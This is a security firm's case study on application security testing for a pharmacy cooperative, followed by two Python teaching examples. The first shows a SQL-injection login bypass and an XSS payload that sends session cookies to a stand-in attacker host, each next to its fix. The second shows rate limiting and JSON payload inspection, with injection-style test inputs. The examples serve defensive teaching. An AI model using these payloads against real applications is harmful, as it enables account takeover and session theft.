
Case Study

Security solutions for a leading pharmaceutical company

Whom we worked with

The client is a nationwide, member-owned cooperative of over 2,000 independent pharmacies, which banded together to form the organisation.

Our Solution

  • Analysed the application and produced a threat model and an application security (AppSec) plan
  • Used the OWASP Top 10 and the CWE/SANS Top 25 as the baseline list of vulnerability classes to test for
  • Built security into the software development lifecycle so that vulnerabilities are found and fixed early, when they are cheapest to remediate
  • Introduced standalone security scanning of source code and binaries before they are pushed to hosted repositories such as GitHub and Bitbucket
  • Identified every application input and output (files, environment variables, URL parameters, form submissions, configuration files, database sources, registry keys, etc.), i.e. the trust boundaries where untrusted data enters or leaves the application
  • Ran logic tests on authentication, login, email confirmation, business workflows, data encryption, etc.
  • Delivered a report listing all severity 1, 2 and 3 vulnerabilities with corresponding remediation guidance

Challenges

  • Applications and business processes were poorly documented, and in-house IT security knowledge was limited
  • Few staff understood the applications' internal implementation details or the internals of the web interface
  • The top priority was to find vulnerabilities in source code with SAST tools such as SonarQube, Checkmarx, Puma Scan and Veracode
  • Test for SQL injection, cross-site scripting, business workflow flaws, authentication weaknesses, brute-force login attacks, exposed web server files, etc., using SQL injection tooling, Burp Suite and OWASP ZAP as an intercepting proxy
  • Evaluate the security risk of the business-critical web applications
  • Provide detailed recommendations for raising the security level of the information systems and protecting the applications from deliberate damage
  • Brief the client's management team on the existing information security risks
  • Educate developers on common vulnerabilities and secure coding practices

Impact

  • Reduced the risk of downtime, data theft and website defacement
  • Protected against web attacks such as SQL injection, cross-site scripting (XSS) and remote file inclusion (RFI)
  • Used DAST tools to test the application's third-party interfaces and APIs
  • Remediated the code vulnerabilities and suspicious behaviour identified with Veracode, SonarQube, Acunetix and OWASP ZAP
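The two injection classes named above, SQL injection and cross-site scripting, are easiest to understand side by side with their fixes. The following is an added example, not code from the original case study or from the client's applications: it builds a constructed in-memory SQLite table of accounts, shows a string-concatenated login query being bypassed with a classic `' --` payload, and contrasts it with a parameterised query; it then shows a reflected value being emitted raw into HTML versus being HTML-encoded for the element-content context. The table name, the user rows, the password handling (plaintext, which a real system would never do) and the payloads are all assumptions made for the illustration.

```python
"""Added example: SQL injection and XSS, vulnerable vs hardened form.
The accounts table, rows and payloads are constructed for this demo."""
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: an in-memory accounts table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO accounts VALUES (?, ?, ?)",
        [("alice", "correct horse", "pharmacist"), ("bob", "hunter2", "admin")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Builds the statement by concatenation, so user input becomes SQL."""
    query = (
        "SELECT role FROM accounts WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(query).fetchone() is not None


def login_hardened(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised query: values travel separately from the SQL text, so
    quotes and comment markers in the input cannot alter the statement.
    (Passwords are compared in plaintext here only to keep the demo short.)"""
    row = conn.execute(
        "SELECT role FROM accounts WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


def render_vulnerable(name: str) -> str:
    """Reflects user-controlled text straight into the HTML body."""
    return "<p>Welcome, " + name + "</p>"


def render_hardened(name: str) -> str:
    """HTML-encodes the value for the element-content context it lands in."""
    return "<p>Welcome, " + html.escape(name, quote=True) + "</p>"


# Classic authentication bypass: the quote closes the username literal and
# the SQL comment marker (-- is valid in SQLite) discards the password check.
SQLI_PAYLOAD = "bob' --"
# Reflected XSS payload that would exfiltrate the session cookie if rendered raw.
XSS_PAYLOAD = "<script>location='https://evil.example/?c='+document.cookie</script>"


def demo() -> dict:
    """Runs both payloads through both code paths and returns the outcomes."""
    conn = make_db()
    return {
        "vuln_bypass": login_vulnerable(conn, SQLI_PAYLOAD, "wrong password"),
        "hard_bypass": login_hardened(conn, SQLI_PAYLOAD, "wrong password"),
        "hard_legit": login_hardened(conn, "alice", "correct horse"),
        "vuln_html": render_vulnerable(XSS_PAYLOAD),
        "hard_html": render_hardened(XSS_PAYLOAD),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The vulnerable login accepts the payload with a wrong password because the resulting statement reads `... WHERE username = 'bob' --' AND password = '...'`; the parameterised version rejects it while still accepting real credentials. Note that `html.escape` is only correct for text placed in element content or a quoted attribute; values dropped into a JavaScript block, a URL or a CSS context need the encoding for that context instead.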

How we helped

  • Reduced cost and time by identifying and fixing vulnerabilities early in the code, when remediation is cheapest
  • Performed black-box and white-box penetration testing, identifying vulnerabilities and exposures with SAST and DAST tools
  • Gave the security team greater speed and agility
  • Enabled the team to respond rapidly to changes and new requirements
  • Used Software Composition Analysis (SCA) to find vulnerable third-party components, and supplied ready-to-implement code fixes wherever possible
  • Scanned compiled binaries for the languages where binary analysis is supported, as needed
  • Crawled modern frameworks and APIs from their OpenAPI (Swagger) definitions, and used WebInspect's Postman integration to handle unique workflows, complex authentication and custom parameter requirements
  • Applied rate controls to API requests and inspected JSON and XML API payloads, so that the web server stays available and the data it serves remains protected
  • Used threat hunting to detect compromise before it becomes public
  • Adopted immutable infrastructure, which improves overall security by reducing configuration drift and insecure defaults and by increasing automation and the coverage of what is deployed
  • Applied the "secure by design" principle throughout
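The rate-control and payload-inspection point above is the one most often left abstract, so here is an added example of what it looks like in code. It is not the client's implementation or any vendor's product: it is a per-client token-bucket limiter and a JSON request inspector (size, nesting depth, malformed input, unexpected fields, wrong types) in front of a hypothetical order-submission endpoint. The field names in `ORDER_SCHEMA`, the bucket size and refill rate, the byte and depth limits, and the sample requests are all assumptions chosen for the illustration; XML payloads are out of scope here and need their own parser hardening (external entity expansion disabled) on top of the same checks.

```python
"""Added example: token-bucket rate control plus JSON payload inspection.
Schema, limits and sample traffic are constructed for this demo."""
import json
import time

MAX_BODY_BYTES = 4096   # assumed limit for this endpoint
MAX_DEPTH = 8           # assumed nesting limit
ORDER_SCHEMA = {"ndc": str, "quantity": int, "pharmacy_id": str}  # hypothetical


class RateLimiter:
    """Token bucket per client key: `capacity` requests in a burst,
    refilled at `rate` tokens per second. `clock` is injectable for tests."""

    def __init__(self, capacity: float, rate: float, clock=time.monotonic):
        self.capacity, self.rate, self.clock = capacity, rate, clock
        self.buckets = {}  # client key -> (tokens, last_refill_time)

    def allow(self, client: str) -> bool:
        now = self.clock()
        tokens, last = self.buckets.get(client, (self.capacity, now))
        tokens = min(self.capacity, tokens + (now - last) * self.rate)
        if tokens < 1:
            self.buckets[client] = (tokens, now)
            return False
        self.buckets[client] = (tokens - 1, now)
        return True


def json_depth(value, depth: int = 1) -> int:
    """Maximum nesting depth of a decoded JSON value."""
    if isinstance(value, dict):
        return max([json_depth(v, depth + 1) for v in value.values()], default=depth)
    if isinstance(value, list):
        return max([json_depth(v, depth + 1) for v in value], default=depth)
    return depth


def inspect_json(body: bytes, schema: dict) -> tuple:
    """Returns (ok, reason). Rejects oversized, malformed, over-nested and
    off-schema payloads before application code ever sees them."""
    if len(body) > MAX_BODY_BYTES:
        return False, "body too large"
    try:
        data = json.loads(body)
    except (ValueError, RecursionError):  # deeply nested input can overflow the parser
        return False, "malformed JSON"
    if not isinstance(data, dict):
        return False, "top-level object expected"
    if json_depth(data) > MAX_DEPTH:
        return False, "nesting too deep"
    unexpected = set(data) - set(schema)
    if unexpected:
        return False, "unexpected fields: " + ", ".join(sorted(unexpected))
    for key, typ in schema.items():
        if key not in data:
            return False, "missing field: " + key
        # bool is a subclass of int in Python, so reject it explicitly
        if isinstance(data[key], bool) or not isinstance(data[key], typ):
            return False, "wrong type for " + key
    return True, "ok"


def handle_request(limiter: RateLimiter, client: str, body: bytes) -> tuple:
    """Rate check first (cheap, protects availability), then payload inspection."""
    if not limiter.allow(client):
        return 429, "rate limit exceeded"
    ok, reason = inspect_json(body, ORDER_SCHEMA)
    return (200, "accepted") if ok else (400, reason)


def simulate_burst() -> list:
    """Constructed traffic: one client sends 7 valid requests 0.1 s apart
    against a 5-token bucket refilling at 1 token/s, then one more after a
    2 s pause. Returns the status codes in order."""
    t = [0.0]
    limiter = RateLimiter(capacity=5, rate=1.0, clock=lambda: t[0])
    good = json.dumps({"ndc": "0001-0002-03", "quantity": 30, "pharmacy_id": "RX-1"}).encode()
    statuses = []
    for _ in range(7):
        statuses.append(handle_request(limiter, "10.0.0.5", good)[0])
        t[0] += 0.1
    t[0] += 2.0
    statuses.append(handle_request(limiter, "10.0.0.5", good)[0])
    return statuses


def inspect_samples() -> dict:
    """Constructed payloads covering each rejection path; maps name -> accepted?"""
    samples = {
        "good": b'{"ndc": "0001-0002-03", "quantity": 30, "pharmacy_id": "RX-1"}',
        "extra_field": b'{"ndc": "x", "quantity": 1, "pharmacy_id": "RX-1", "role": "admin"}',
        "wrong_type": b'{"ndc": "x", "quantity": "30; DROP TABLE orders", "pharmacy_id": "RX-1"}',
        "bool_as_int": b'{"ndc": "x", "quantity": true, "pharmacy_id": "RX-1"}',
        "deep": b'{"ndc": "x", "quantity": 1, "pharmacy_id": ' + b"[" * 50 + b"]" * 50 + b"}",
        "huge": b'{"ndc": "' + b"A" * 5000 + b'"}',
        "malformed": b'{"ndc": ',
    }
    return {name: inspect_json(body, ORDER_SCHEMA)[0] for name, body in samples.items()}


if __name__ == "__main__":
    print(simulate_burst())
    print(inspect_samples())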